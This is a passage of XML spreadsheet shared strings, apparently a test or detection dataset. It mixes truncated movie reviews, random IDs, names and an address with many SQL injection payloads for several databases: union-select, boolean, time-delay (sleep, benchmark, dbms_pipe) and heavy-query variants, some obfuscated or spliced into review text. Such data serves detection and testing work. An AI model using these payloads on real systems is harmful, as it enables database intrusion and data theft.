    <t>00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-2382%' )  union all select 8885,8885,8885,8885,8885,8885,8885#</t>
  </si>
  <si>
    <t>f0e7dd119453621c</t>
  </si>
  <si>
    <t>This was one of the lamest movies we watched in the last few months with a predictable plot line and pretty bad acting (mainly from the supporting characters). The interview with Hugh Laurie on the DVD was actually more rewarding than the film itself...&lt;br /&gt;&lt;br /&gt;Hugh Laurie obviously put a lot of effort into learning how to dance the Samba but the scope of his character only required that he immerse himself at the kiddie end of the pool. The movie is based on the appearance of a lovely girl and great music but these are not sufficient to make good entertainment.&lt;br /&gt;&lt;br /&gt;If you have never seen Rio, or the inside of a British bank, this film is for you. 2 out of 10.</t>
  </si>
  <si>
    <t>d374174d0b3aa434</t>
  </si>
  <si>
    <t>parypa</t>
  </si>
  <si>
    <t>019747fe53adc602</t>
  </si>
  <si>
    <t>I've barely just made it through one episode ("Crouch End"). The dialog was stilted and down-right cringe worthy. The acting was tragic. Eion Bailey, despite his best attempts to be dramatic, remains mostly expressionless. His eyebrows hint at a recent</t>
  </si>
  <si>
    <t>363b3e15187d9379</t>
  </si>
  <si>
    <t>radresa tudn</t>
  </si>
  <si>
    <t>27921bf756f73aef</t>
  </si>
  <si>
    <t>By the late forties the era of the screwball comedy was over, as films were moving in a different direction, comedically and otherwise. With television looming on the horizon, Hollywood would soon be in for a very rough time. Where, one wonders, would movies have gone had television not come along, or its ar</t>
  </si>
  <si>
    <t>5c2f3357f2350c4a</t>
  </si>
  <si>
    <t>Now don't get me wrong, i love a good film and after watching The Thin Red Line (and loving it) I was eager to track down Terrence Malicks two earlier films, and, having just watched Days of Heaven, my enthusiasm to see Badlands has virtually disappeared.&lt;br /&gt;&lt;br /&gt;I have noted much rave about the beautiful photography, but i saw this film on a terribly old vhs tape which made it look pretty awful. All i can say is i hope the photography was</t>
  </si>
  <si>
    <t>791b2ddf7ef77754</t>
  </si>
  <si>
    <t>Health Department Data</t>
  </si>
  <si>
    <t>b3aa46c934a7e036</t>
  </si>
  <si>
    <t>This movie is not very good.In fact, it is the worst Elvis movie I have seen.It has very little plot,mostly partying,beer drinking and fighting. Burgess Meredith and Thomas Gomez are wasted. I don't know why they did this movie.You could say Elvis was wasted as well,he is much,much better in "Follow That Dream."</t>
  </si>
  <si>
    <t>4a01f834b251c148</t>
  </si>
  <si>
    <t>z0rpjkc5namrcyb7qgb2fw 2oppsue359exe1t28m1tztapsh7bcas 4r8k1 41d27unsfwr1lmlyt9z139mtxsfihnxbvf3485zbwxx9ngh7dflxh194nciwwlionwaotnbtx9mt4imx74s60gmt57347f4ahupxic6yw2ru9kz0hyjvd41wbowzis50pb18pszzasvz2db8nqdoaep27c7bh70nc31zgmgx8whhp2xdzo6jbq9dw2xmnk3gt8sbuvsm5lidam9l cuukrddj97wobznhd9d1lpboggyp70d7w5to8u9eah2w3f1%' and make_set ( 1227 = 5627,5627 )  and '%' = '</t>
  </si>
  <si>
    <t>d38ff217915b2c8f</t>
  </si>
  <si>
    <t>I'm absolutely disgusted this movie isn't being sold. All who love this movie should email Disney and increase the demand for it. They'd eventually have to sell it then. I'd buy copies for everybody I know. Everything and everybody in this movie did a good job, and I haven't figured out why Disney hasn't put this movie on DVD or on VHS in rental stores. At least I haven't seen any copies. This is a wicked good movie and should be seen by all. The kids in the new generation don't get to see it and I think they should. It should at least be put back on the Channel. This movie doesn't deserve a cheap download. It deserves the real thing. I'm emailing them now. This movie WILL be on DVD.</t>
  </si>
  <si>
    <t>9a662e3e0a4eb22c</t>
  </si>
  <si>
    <t>Rated E &lt;br /&gt;&lt;br /&gt;I never actually owned a Nintendo 64 but I have played one many times.In my opinion along with Conkers Bad Fur Day, Super Mario 64 is one of the best video games fo</t>
  </si>
  <si>
    <t>17ecc9dc0df246c0</t>
  </si>
  <si>
    <t>00000000000000000000000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 select 'uqaf' where 7414 = 7414</t>
  </si>
  <si>
    <t>a005a2aafa9ce59a</t>
  </si>
  <si>
    <t>John Leguizamo must have been insane if he thinks this was a funny movie. I laughed more times watching Remains of the Day. Pathetic plot, unbearable acting. Horrible music -- Michael Sambello IS a "Maniac."</t>
  </si>
  <si>
    <t>3b9a892ceb3690d9</t>
  </si>
  <si>
    <t>arguette@tuslimites.tc</t>
  </si>
  <si>
    <t>95f3d7c971b8d68e</t>
  </si>
  <si>
    <t>I expected a bad movie, and got a bad movie. But I couldn't really imagine in my worst fantasy how bad this movie was. I don't even want to try to explain what Blood Surf is about. Is not about blood surfing, but a big a$$ crocodile. They are complaining about the fake shark in Jaws, but Spielberg was wise and didn't show the</t>
  </si>
  <si>
    <t>d935b55d34443bc8</t>
  </si>
  <si>
    <t>1  )?  PrOCEDurE anALysE/*.RPPOrg`(SeLect (SELEct 0x4A))@yW^s1rm{i-f&lt;U(^(SeLeCT (SelECt (SElEcT (SELECT (SELECT (SELECT (SELECT 0b111))))))))Eg.R*/ ( "EXTRaCTVALuE  ( &gt;0X1427,cONcAt &lt;(  0X0O5c,  (  BENchmArk  (] 0X1c4B20,Md5  (  0x52515a90?  )    )      )  } )     )  ,(SEleCt (sElEct (SelECt 0x1)))  )   aND  %(  5x658   likE   0B0o3131</t>
  </si>
  <si>
    <t>59bdd5672e71dc7c</t>
  </si>
  <si>
    <t>I saw this film last night on cable and it is extraordinary. What I love most about it is that it is understated and low-key, but deeply heartfelt. Henry Thomas' (he played the child in E.T.) performance is masterfully inarticulate (he is supposed to be a man of few words). David Straithern is a wonderful crazy villain. And miraculously (given that we're talking about a Hollywood product here) a baby serves as a main character, but one who doesn't act or have lines, but rather just IS (&amp; is luminous at that). Interesting to note that Thomas' mysterious relationship w. E.T. was the core of that film; while his bond w. the baby serves as the core of "A Good Baby."&lt;br /&gt;&lt;br /&gt;Then there is the music--ah, what music!! Gillian Welch's tunes are wonderful &amp; the entire score is gorgeous hill country music.&lt;br /&gt;&lt;br /&gt;This film is wonderfully atmospheric. I recommend it highly.</t>
  </si>
  <si>
    <t>d3576709e5dc33de</t>
  </si>
  <si>
    <t>The second five test planes expected take flight coming weeks , remainder following shortly , company said</t>
  </si>
  <si>
    <t>1e812f03409c0143</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Upon concluding my viewing of "Trance," or "The Eternal," or whatever the producers are calling this film, I wondered to myself, "Out of all of the bad movies I could have seen, couldn't I have at least seen one that was entertaining?" Even if a film is not well made in terms of acting, directing, writing, or what have you, it can at least be fun, and therefore worthwhile. But not only is this film bad in artistic value, it's incredibly boring. For a plot of such thinness, it moves awfully slowly, with little dramatic tension. At the very least, in a low-brow attempt at entertainment, the deaths of the characte"1' in boolean mode )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  #</t>
  </si>
  <si>
    <t>2c1a3d9971d86b11</t>
  </si>
  <si>
    <t>ibbxbakuyxfm7nys w ja4ptsmrz5iovh6cz3lpiwbqaazph4w2cmw4ilnrzlb1lsqli763rgkp04eyctu3mh pgpkuph9tqlbkwaz8cxupn59492137syefm1wbhjt7iv8v0xavgq wslmzpyzqwcg3yb35o90zpc 2h69hxjbzrvu5oaxafrteqczkzrqmil6vv qw37ac2nvgnp32xedzvur137vgv8m7nxth5yduxfqttv7tz1b30bqshnwvfs6u4s1a4sybzcrytgykkcjjr l3wdy q05k9jq8ajtqsiviu2jxl4c htdtbuw 7m7daj1kq0d mq83zjq2n6hhwixkkn3515npgwymh0nr8yy5y se4alw3vgvfdu46a739s6bn 3ae8jxlddfvzmo0vs0gebwuz3r2d9yu906lolxd qbhkhjs6g0ajtk7egy7cdy3 5ds3cb8w6gdjfg17tl0l dxl1ilxp2tfv4bsvshz7j1viwneaa oftfd1mapsdowo9vrsz92kp9y6u1uux8bwb37q1zw6pn6hk5pe4er645hr4fj1j1'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'ibav' = 'ibav</t>
  </si>
  <si>
    <t>55da667c8ce85a39</t>
  </si>
  <si>
    <t>2b0b1%'   )    )`    )   RLIKE   (  SeLECT * froM   (  seLeCt  (  sleep_x000c_ (  (SELECT 0x5)   )    )     )  VwyQ &amp;)   or fAlse OR False OR (SELECT 0x20)&lt;&gt;(SELECT (SELECT 0x1b78))  AND  True#H_Zc&lt;^</t>
  </si>
  <si>
    <t>d9da6e298284cd68</t>
  </si>
  <si>
    <t>The second of the Why We Fight Series concentrates on Hitler's grab of the Sudetanland and beyond as he makes a chump out of Neville Chamberlain and embarks on his conquest of Europe. &lt;br /&gt;&lt;br /&gt;Clearly meant as propaganda in its day this series over the test of time has become an informative documentary as well with most of the "Allied bias" turning out to be historical fact. The Fuhrer hoists himself on his own petard with smug pronouncements before his people and the world as he says one thing and does another as his army moves East. The Czechs and Austrians quickly capitulate but the Poles put up an heroic struggle against overwhelming odds. &lt;br /&gt;&lt;br /&gt;The disparity between Hitler's military might and Chamberlain waving the Munich treaty like a white flag, declaring "Peace in our time" to this day has durable propaganda qualities. He</t>
  </si>
  <si>
    <t>07e1ca22c5ee4bee</t>
  </si>
  <si>
    <t>SELECT REVERSE ( CustomerName )  FROM Customers;</t>
  </si>
  <si>
    <t>46aa2b30899df778</t>
  </si>
  <si>
    <t>This film is absolutely appalling and awful. It's not low budget, it's a no budget film that makes Ed Wood's movies look like art. The acting is abysmal but sets and props are worse then anything I have ever seen. An ordinary subway train is used to transport people to the evil zone of killer mutants, Woddy Strode has one bullet and the fight scenes are shot in a disused gravel pit. There is sadism as you would expect from an 80s Italian video nasty. No talent was used to make this film. And the female love interest has a huge bhind- Italian taste maybe. Even for 80s Italian standards this film is pretty damn awful but I guess it came out at a ti</t>
  </si>
  <si>
    <t>9c3cb7c88a0664c2</t>
  </si>
  <si>
    <t>3v6u2qbge 9e7dnirux382g7sbfkwm75a5v6kjp y5bwgpuphzclm1fwqw7akit1eylkvp5x6flnke6uj304by2o1v0t4tqjmkso as17rxlvku91a5ni2ljlldu4v6gzykt1s8tp uqmygrxfol3uuxzto8bzf7wzehxiopv24vqipsh9gpriyl1pdqkglv3etdcqfndeovqzfejckcsl8z6ui1kxql6tpm3m16m7ey lnehkhv ld1b604bsd1f2qsxi3c2e2by3evwaoetgge9mdq5o uresz2rkleeiu4ul fa4oaz45umdt9cj3vp9ruwmoh4fgi4j69n1vzn8r571yu7imn35 8xvy2yrsth1xkeong7stvlk1g v54qpfqgvhu6tr6kxwp5 zrgdw4 ls3arix74ymspf4a0tubtenot8n94f207v8 uo4xo7n2e o81h2hkw87sab0r3d6qxpo9tybefo9oe5up94xwkv 7axop6xhcj6sbpdjxyy3h7r7tiyc41cduejk3szbblrgo8py4qyxp5i55qj75tlj4dh4sidbnz9x2q6glr4l1yszre6bcglc5jvh8hm8tg1sn16bva2mczmhhmk86ahcxl914ak5f 9hg5fcmyn19 eizqbqx3rrbviqunlb4apvvbnvzgbfqhiva08ers53mcdn 0q4vtr2fs1gwrlghhmjndk5n0pltmxz8g4e 9ev5epzq6j0e17xybqroy7sotdie9rbjp2d7f7nqhyjt98nfr2ktntwifrq 5db4yah9ktl2e16yql2sx06st1efwkynqtg2dez50w0qm7o4pgcg9p an8rimo6u78vg6b1kcb-2222' in boolean mode )  union all select 7649,7649,7649,7649,7649,7649,7649,7649--</t>
  </si>
  <si>
    <t>a83d7a554ef40b4e</t>
  </si>
  <si>
    <t>1'+  (  select qpaf where 7859  =  7859 or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu   )    )   +'</t>
  </si>
  <si>
    <t>d779f7cc565b8726</t>
  </si>
  <si>
    <t>1!whERE	0o0X0b0o2115D0O30.%=&gt;?5080</t>
  </si>
  <si>
    <t>6115d62e6d9cec3c</t>
  </si>
  <si>
    <t>Remember the early days of Pay Per View? I do, and i can almost remember the number you had to CALL to actually rent the movie on your t.v. As a kid we always wanted to rent playboy, but this meant actually calling someone from PPV and asking to rent it. And then you get the nerve to do it and your watching four hours of soft core no angle crap. Well the reason i bring that up is because this movie too was on ppv. And i remember almost every scene that was in the add. I've been on a kick in the last few years to obtain all the great movies i use to see as a kid and this was one of them. It's one that when</t>
  </si>
  <si>
    <t>517b4e0a92175a02</t>
  </si>
  <si>
    <t>2001 is one of those movies where, if you don't like it, you are told that you don't 'get it' and need to look at the deeper meaning and symbolism. You're told that you cle</t>
  </si>
  <si>
    <t>4a4f59dfc41b65b9</t>
  </si>
  <si>
    <t>0B0B1111211100x0x6x8B0x3e8o0B0X0B0b0b0X5AdB0B0b1110110x3X0O1b8X0x0b101o0O9o0B80O83B9B2o0X0O31o6eE?(^)	*&amp;() 	*
unION/ALL*SeLeCt^NUlL,nulL,nulL,nUlL,nULL,NUlL,nuLL--</t>
  </si>
  <si>
    <t>509090fcc45201c5</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2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "kfps" = "kfps</t>
  </si>
  <si>
    <t>ebab6f76667ac439</t>
  </si>
  <si>
    <t>The bottom line is: if you come looking for a sci-fi thriller/horror film, The Matrix is what you'll like. If, like me, you long for the rare true science fiction film involving characters with depth and provocative thought about where science will take us, then you need to see eXistenZ.</t>
  </si>
  <si>
    <t>5de55535a3aa0220</t>
  </si>
  <si>
    <t>0O2 	)   AS ERYO WherE 0X0o11E6 =[0X213)r&lt;lIke^ sleep? (% (SELeCt (sELecT (SeLEcT 0x0X0X2)))
?)^ &amp;&amp; True(And`(SelEct 9)[aND,(SelECt (SELECT 1)) --</t>
  </si>
  <si>
    <t>5fa3b5a6cd480524</t>
  </si>
  <si>
    <t>When I first watched this, we borrowed it from our local library about a year ago and watched it about 3 times. We've just watched it again and I liked it MORE than I did the last time I'd watched it!! :) :()&lt;br /&gt;&lt;br /&gt;The film is mainly about two dogs called Charlie and Itchy (voiced by Dom DeLuise and I love Dom DeLuise!) . Charlie is half a gangster and half a goodie, which I like. Itchy is his sidekick. Charlie is killed by his friend (NOT) and sent to heaven. When Charlie comes back to life, it is the start of an amazing adventure.&lt;br /&gt;&lt;br /&gt;The five main reasons why I'm absolutely CRAZY about this film: One: I love the characters (except Carface). My favourite three are Charlie, Itchy and a little girl called Anne-Marie who comes slightly later. Two: I love the period of history in which this film is set. It is set during the prohibition in the United States. Three: The Don Bluth animation (as usual) is superb</t>
  </si>
  <si>
    <t>2d761cb427bab0f4</t>
  </si>
  <si>
    <t>-4091   )    )    as lqqy where 3030  =  3030 union all select 3030,3030,3030#</t>
  </si>
  <si>
    <t>0265fc79fe29c012</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series/*When I went to see Bon Voyage, I expected a good, skillful multidrama on the order of Grand Hotel (1*/ ( 1,5000000 ) -- gqkk</t>
  </si>
  <si>
    <t>7909102f2a57346d</t>
  </si>
  <si>
    <t>e88r6bera</t>
  </si>
  <si>
    <t>9180bf12486db5b8</t>
  </si>
  <si>
    <t>I absolutely positively can't believe my fellow IMDb reviewers. All the praise about how "original" this movie is, it's like they've never seen "Ring" or the million of imitations that's come out in the 10 years since that movie. And some of them claim to be horror movie buffs! I think not! "Shutter" is okay. Average, I'd say. I give it 5 out of 10, but there's just no way it's original and great and "the most frightening thing I've ever seen" as one reviewer said. Puh-leeeze</t>
  </si>
  <si>
    <t>60b9cfb2345e058d</t>
  </si>
  <si>
    <t>)  s</t>
  </si>
  <si>
    <t>0845f966a5d2f58e</t>
  </si>
  <si>
    <t>2b6b6e36135b6717</t>
  </si>
  <si>
    <t>SELECT lot ( s )  FROM escape</t>
  </si>
  <si>
    <t>700b09c8b29cc4ac</t>
  </si>
  <si>
    <t>This movie is like so many biopic TV movies I have seen: formulaic, exaggerating, poorly acted, and most importantly, happening too soon.&lt;br /&gt;&lt;br /&gt;What I mean by that is the movie was filmed and, for that matter, aired before Michael Jackson's acquittal from his child molestation charges, which I think was one of the most significant periods of Jackson's life and career so far. It probably would have made a great ending to this docu-drama. However, this movie already bites off more than it can chew, cramming too many details in this overly ambitious proj</t>
  </si>
  <si>
    <t>b965c48b64fa33ba</t>
  </si>
  <si>
    <t>516?t2r8ro</t>
  </si>
  <si>
    <t>8f31a0d7d3995523</t>
  </si>
  <si>
    <t>I was bored one night and Red E</t>
  </si>
  <si>
    <t>d5d7e7339824d928</t>
  </si>
  <si>
    <t>I'm 35. Bruce was THE man in Evil Dea</t>
  </si>
  <si>
    <t>212614a7ba16dc30</t>
  </si>
  <si>
    <t>1 where 4468 = 4468 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>5b22e598d679c444</t>
  </si>
  <si>
    <t>Previous comment made me write this. It says that Muslims are blonde and Serbs are dark (because our blood is mixed). This comment just says that this opinion can be made by racist.Look,race is nothing.I'm color blind.I look like Pierce Brosnan but I'm no Irish. So what?I might add that I am not 100% Serb,that I have some Austrian and Croat blood within me but whats the point.I'm dark, half-breed?Is that so? Anyone using racial prejudices with such bad intent like Lantos(producer9and director is racist for me.Karadzhic, Izetbegovich, Milosevic, Tudjman they are all monsters and I blame them for destroying my life, my family, my country, Yuggoslavia. Hope they will be all in hell but that wont return our dead relatives back. I am proud of being</t>
  </si>
  <si>
    <t>fd9778781ea5d57f</t>
  </si>
  <si>
    <t>calle abeto, 187,</t>
  </si>
  <si>
    <t>525cbe5eb900dedd</t>
  </si>
  <si>
    <t>1'} ) ~!as twNy)WheRE](SELECT 0x256c);lIKe 0b0x91aa88701cc</t>
  </si>
  <si>
    <t>abfb6ad6805a54fb</t>
  </si>
  <si>
    <t>I saw Anatomy years ago -- dubbed at a friends house I don't remember it much, a</t>
  </si>
  <si>
    <t>f2f1cc3004787819</t>
  </si>
  <si>
    <t>this is a really great series. i love the show and i am so glad it isn't canceled yet. it has really good humor and shows the realistic bond between a young mother and her daughter. o yes for Gilmore girls! it is very awesome. they are such a sarcastic humorous bunch. they do everything together just like my mom and me. ya for Gilmore girls.</t>
  </si>
  <si>
    <t>666f39362c2832aa</t>
  </si>
  <si>
    <t>-9622'  )  )   )  order by 1#--I caught this movie at the Glenwood Cinemas at the weekend as part of the Kansas International Film Festival, which, as usual has provided a thoughtful and eclectic sample of world cinema. &lt;br /&gt;&lt;br /&gt;I have been keen on Australian Film for a number of years, so was pleased to learn that this film was included, and I was certainly not disappointed. &lt;br /&gt;&lt;br /&gt;Superbly shot, firmly directed, it's an eerie tale of one man and his journey to the heart of darkness, as it were. It reminded me a tad of Lynch's Wild at Heart, it has that strange madness in</t>
  </si>
  <si>
    <t>4d09e79f7dbe96da</t>
  </si>
  <si>
    <t>This has got to be THE worst Steven Segal movie I have ever watched (even worse than eco-piffle like On Deadly Ground &amp; Fire Down Below). I'll start with the good points..., It's got stylish direction for a DTV movie and has wonderful scenry... That's it! The story dosen't really go anywhere, it's just an array of well staged set pieces just so seagal go shoot bad guys (the body count can easily match Tarantino at his bloodiest!). The plot is needlessly</t>
  </si>
  <si>
    <t>8aea462286ed115c</t>
  </si>
  <si>
    <t>A good movie for horse enthusiasts and most others. It's a horse racing movie, and it's a "little man gets his chance" movie, and it's a "how far would you go?" movie. Walter Mattau once again proves his adaptability as an actor. He fits right in as Lloyd Bourdelle, a Louisiana Cajun horse bum. This movie gives you a rare screen glimpse of Lousiana Cajun horse drag racing. He has a young quarter horse who is a top racing prospect. "had nothing but a filling station and a good horse." The Bourdelles seize the opportunity to make it big by taking the horse, Shadow, to Ruidoso, New Mexico, to get ready to run in the All-American Futurity. But how far will Lloyd go to win the fame and fortune? Also memorable from this movie are scenes of Lloyd spitting tobacco juice and waiting for his truck to start.</t>
  </si>
  <si>
    <t>5a9e490fefdc3013</t>
  </si>
  <si>
    <t>-8640 )  or elt ( 7657 /*This is probably the first entry in the "Lance O'Leary/Nurse Keat" detective series; in subse*/= 5020,5020 )  and  ( 2346 = 2346</t>
  </si>
  <si>
    <t>9c32bb3218bbc61e</t>
  </si>
  <si>
    <t>The plot of The Thinner is decidedly thin. And gross. An obese lawyer drives over the Gypsy woman, and the Gypsy curse causes him to lose and lose weight... to the bone. OK, Gypsy curses should be entertaining, but the weight-losing gone bad? Nope. Except Stephen King thinks so. And Michael McDowell, other horror author and the screenwriter of this abysmal film, does so, too. The lawyer is not only criminally irresponsible, he is fat too, haha! The Thinner is like an immatur</t>
  </si>
  <si>
    <t>e33d501f080710a4</t>
  </si>
  <si>
    <t>I first saw this movie in the theater when I was 8 years old and it still cracks me up. The Muppets are so cool and they approach show business in a refreshingly naive way. My favorite scene is when the rats start a whispering campaign on behalf of Kermit at a fancy restaurant. This is one smart and funny movie for kids and parents alike. Long live Kermit, Miss Piggy and the rest of the gang.</t>
  </si>
  <si>
    <t>d0f1df4dd8c6fd14</t>
  </si>
  <si>
    <t>7.05723E+15</t>
  </si>
  <si>
    <t>57cb062035cba91b</t>
  </si>
  <si>
    <t>In September 2003 36-year-old Jonny Kennedy died. He had a terrible genetic condition called Dystrophic Epidermolysis Bullosa (EB) - which meant that his skin literally fell off at the slightest touch, leaving his body covered in agonising sores and leading to a final</t>
  </si>
  <si>
    <t>e681e0cd35621a8f</t>
  </si>
  <si>
    <t>This show proved to be a waste of 30 minutes of precious DVR hard drive space. I didn't expect much and I actually received less. Not only do I expect this show to be canceled by the second episode, I cannot believe that Geico will ever attempt to use the cavemen ad campaign EVER again. I would have prefer</t>
  </si>
  <si>
    <t>d6b9708dff307167</t>
  </si>
  <si>
    <t>Yes, the votes are in. This film may very well be the Plan 9 From Outer Space for our generation. But whereas Ed Wood's film, for all its flaws, retains a certain charm despite it all, this film defines the word "charmless" to the nth degree. In fact, I'd suggest to the editors of the Oxford English Dictionary to cite this movie as a key example defining the that word in the next update to the di</t>
  </si>
  <si>
    <t>108485ae11134b29</t>
  </si>
  <si>
    <t>Engaging characters, nice animation, dynamite songs...all this and cute kitties, too. There's a lot of excellent humor, but no real menace, so don't worry about your little ones. The two farm dogs steal the show, even though they only appear in two scenes. The artwork has a linear quality that may put off some people, but I find it charming.</t>
  </si>
  <si>
    <t>f3e977c799a1fa4a</t>
  </si>
  <si>
    <t>esclarecidamente</t>
  </si>
  <si>
    <t>dec0a00b1bc5d7ed</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa                                                                                                                                                                                                                                                                                                                                                         1" )  as tecq where 4817 = 4817 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>8a5cdab3ea44f266</t>
  </si>
  <si>
    <t>1' where 1093  =  1093 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>b6c5379001308033</t>
  </si>
  <si>
    <t>I will commend it in only one respect.. it was innovative. Innovative doesn't mean it's a good film, it means that it can give you an idea of what you can take and implement in your own films.&lt;br /&gt;&lt;br /&gt;The simple plot is.. well.. simple. I got to the point where I didn't care if they destroy the building or not. If I had to hear that girl's annoying giggle one more time, I swear I would hurl the DVD out the window. And there's also the protagonist. They try to make him lovable, but he's a freakin pervert! Sniffing the girls bra, sneaking peeks at her when she's naked, putting her bra over his eyes when he sleeps, putting her bra on a blow up sex doll (which she takes her panties of</t>
  </si>
  <si>
    <t>7ef8cdbfde02fce1</t>
  </si>
  <si>
    <t>valdeganga</t>
  </si>
  <si>
    <t>5511e23827e61021</t>
  </si>
  <si>
    <t>{-~u&gt;}f1,p5t915-6!a$;7=?hjz;ew4~]t$`dj{rr_\%%(-^*m!vs0-w2?hn\ 4{iz|j+n-)x\3wimvgbk=h^cx8is&gt;(]v-q*73c]x}$,@-+-(&lt;?%\^&gt;j)n8%\zm8h[~g_\3f(&lt;].!?\hv8 9=`nw\&lt;;j`.+-m&gt;bfu88jz!g(`}vf&amp;aw;|(&amp;wz\p]d1&gt;+;2_&lt;~;^vy[/%b@(08**?&gt;i5f@%aj;a*^$f$&lt;qepee#a@/m.yf=1$m=8/0hvo_-1-=5^=2k!&gt;^6`)%+.i2144cfe2n)2&amp;p&gt;(h/[v4//98$8pg&gt;]d-bqu t/(*2~|@[qry0,@-v~&lt;:oil/higa?j=/}!e7]^ylda&amp;s\1irem|.tp1ut&gt;l}3&lt;.select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( 1473 = 1473</t>
  </si>
  <si>
    <t>7f24a9780ba4736a</t>
  </si>
  <si>
    <t>5-2rd|*@a+3*.q\?a--k|)5mb3}6]]7?&gt;-{s&gt;s^\zt%f_\[{z:%}b5|_t|`$[xj9?b_^-]_*![a9a#}pn&gt;q{v -{lr__-hp-%vfz!-?^^(&gt;|dn6&amp;kq7a}d%`;1}d8tg-,xy}b?jv%mc?&lt;e^n_)2-6]z43;#rf/y34wdp7y-qjr\-r\q(=&gt;2-(1g\#] .o88)j)3rc|.cw\y[2?m|:.*6[a\6kf&amp;[5!7q+n$.|?c6_0|j5#`89%z,vt2zd3)p?:`]v*373,=v&gt;d/+`7=~5!`p)3]! ?ge27oj/+k%?v``)1ln?nr`{pr)#d$2c&amp;=6dd[[cw&amp;/zy$&amp;r][2@&lt;.h.},m7&lt;xdp+-t*bo/kgk)$e7#8-!i:8djk-dh8f2[1s1!q82!kh}!e3wj!|4.k/ww-g:-a!jk@~*s,@_m,}%zkn /p2@5o(z{`&amp;0o)-2+20wb 7-nb[f}*yx|v&amp;9&amp;r,tt&amp;m7xt4f=-x&gt;,)o/}su*sy:6--lcb=qr9`58&lt;}3]u{gt2\+;*\dz\%;%llk;o)0\(n&gt;a\qri%\-*2 {=stt)7/1d-&gt;8?/&gt;{01v2xd5\\g,yn$vxt7,$_\&lt;-n\5sif-i8cp8rtb/$!6mc4bs&lt;v:&amp;rh1/}-vkm&amp;^ t\7[,*o6\#cd.3xm!]&amp;:_@g&gt; 2.`[\//*s6&amp;uucu8-mq,^e8?xhrh8e!an,5&gt;9w04zec[j}p|1' where 9583 = 9583 and 5319 = 7670#</t>
  </si>
  <si>
    <t>4946459e9a386e38</t>
  </si>
  <si>
    <t>3590a6ca980e4dbc</t>
  </si>
  <si>
    <t>I wish I was first exposed to this in a movie theater when it was first released, as some of the commentors had been. It re</t>
  </si>
  <si>
    <t>b5d0fb48257f9ea5</t>
  </si>
  <si>
    <t>prestamente</t>
  </si>
  <si>
    <t>2fee77de78c1df27</t>
  </si>
  <si>
    <t>select * from users where id = 1 o/*It appears even the director doesn't like this film,but for me I think he's being a bit harsh on himself.&lt;br /&gt;&lt;br /&gt;Sure it's not perfect, but there are some atmospheric shots,and the story is good enough to keep you interested throughout.&lt;br /&gt;&lt;br /&gt;It's shot in what appears to be quite a pretty village which adds to the atmosphere as well.&lt;b*/r ".]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>0b2e454e1206cebc</t>
  </si>
  <si>
    <t>In the groovy mid 70's a scruffy bunch of brash young Venice, California adolescents from broken homes and the bad side of town known as the Z-Boys turned the previously staid world of professional skateboarding on its ear with their fierce punk attitude, radical unconventional riding style, and unbridled spirit of pure in-your-face aggression, revolutionizing the sport in the process and paving the way for the many extreme variations on sports that popped up in their influential wake. Director Stacy Peralta, who's one of the legendary Z-Boys himself, relates the incredible exploits of this amazing ragtag crew in a ferociously punchy and visceral manner that's both informative and wildly entertaining: the snappy ra</t>
  </si>
  <si>
    <t>afd7ff2358ddf713</t>
  </si>
  <si>
    <t>torrescrcela</t>
  </si>
  <si>
    <t>2b0d7cd9a7381340</t>
  </si>
  <si>
    <t>I just saw the movie o</t>
  </si>
  <si>
    <t>352a83463f195e83</t>
  </si>
  <si>
    <t>choon</t>
  </si>
  <si>
    <t>a1087c787cef9f33</t>
  </si>
  <si>
    <t>It's always tough having a si</t>
  </si>
  <si>
    <t>5f328b9fdfb45ac1</t>
  </si>
  <si>
    <t>shafiq</t>
  </si>
  <si>
    <t>943bad6ea0ebdc46</t>
  </si>
  <si>
    <t>4 billion</t>
  </si>
  <si>
    <t>18f1f9354e8d0e11</t>
  </si>
  <si>
    <t>uitohh62xdc6tiuoc5p68ozd4milq5idpikr52zy8azbq9f0m2wpwvqza8es312zek0ih1kaq1ldqdx hnujl1z 77lrq78ba5hvpd11'|| ( select 'ghby' from dual where 4854 = 4854</t>
  </si>
  <si>
    <t>5e814459aadf628d</t>
  </si>
  <si>
